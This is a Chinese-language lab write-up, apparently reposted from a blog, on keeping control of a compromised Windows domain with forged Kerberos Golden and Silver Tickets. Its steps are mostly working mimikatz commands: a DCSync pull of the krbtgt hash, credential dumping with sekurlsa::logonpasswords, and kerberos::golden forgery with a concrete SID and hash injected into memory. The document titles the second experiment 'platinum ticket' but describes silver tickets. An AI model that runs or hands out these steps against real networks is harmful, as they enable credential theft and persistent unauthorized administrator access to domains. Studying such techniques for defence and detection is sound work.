獲得域控得用戶密碼時(shí)，為了防止密碼被改，需要進(jìn)行權(quán)限維持

實(shí)驗(yàn)一：黃金票據(jù)

實(shí)驗(yàn)原理：ms14068的漏洞原理是偽造域管的tgt，而黃金票據(jù)的漏洞原理是偽造krbtgt用戶的票據(jù)，krbtgt用戶是域控中用來管理發(fā)放票據(jù)的用戶，擁有了該用戶的權(quán)限，就可以偽造系統(tǒng)中的任意用戶

實(shí)驗(yàn)條件：

1.域名稱?
2.域的SID 值
3.域的KRBTGT賬戶NTLM密碼哈希或者aes-256值
4.偽造用戶名

實(shí)驗(yàn)步驟：

1.獲取域名稱

whoami 或net time /domain

??

2.獲取域的sid值

whoami /all

??

3.獲取域的KRBTGT賬戶NTLM密碼哈希或者aes-256值，具體方法見：https://blog.csdn.net/cxrpty/article/details/105208831

lsadump::dcsync /domain:zz.com /user:krbtgt /csv

??

4.清楚所有票據(jù)

klist purge

??

5.使用mimikatz偽造指定用戶的票據(jù)并注入到內(nèi)存

kerberos::golden /admin:administrator /domain:zz.com /sid:S-1-5-21-1373374443-4003574425-2823219550 /krbtgt:9f3af6256e86408cb31169871fb36e60 /ptt

??

6.查看票據(jù)

??

7.查看域控信息

dir \\WIN-8\c$

??

實(shí)驗(yàn)二：白金票據(jù)

實(shí)驗(yàn)原理：白銀票據(jù)與ms14068和黃金票據(jù)的原理不太一樣，ms14068和黃金票據(jù)都是偽造tgt（門票發(fā)放票），而白銀票據(jù)則是偽造st（門票），這樣的好處是門票不會(huì)經(jīng)過kdc，從而更加隱蔽，但是偽造的門票只對(duì)部分服務(wù)起作用,如cifs（文件共享服務(wù)），mssql，winrm（windows遠(yuǎn)程管理），dns等等

實(shí)驗(yàn)要求：

1.域名
2.域sid
3.目標(biāo)服務(wù)器FQDN
4.可利用的服務(wù)
5.服務(wù)賬號(hào)的NTML HASH?
6.需要偽造的用戶名

實(shí)驗(yàn)步驟：

1.獲取域名及目標(biāo)服務(wù)器名，方法同上

??

2.獲取域id，方法同上

??

3.利用文件共享服務(wù)cifs，獲取服務(wù)賬號(hào)得NTMLhash值(在14068基礎(chǔ)上使用mimikatz獲取)

注意：服務(wù)賬號(hào)就是域控名$

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> 2.txt

??

4.查看域中的所有用戶

??

5.清理所有票據(jù)

??

7.利用mimikatz對(duì)指定用戶進(jìn)行票據(jù)偽裝并注入內(nèi)存

kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服務(wù)賬號(hào)NTMLHASH /user:用戶名 /ptt

??

8.查看域控信息

dir \\WIN-8\c$

??

總結(jié)

以上是生活随笔為你收集整理的域权限维持——黄金票据和白金票据的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。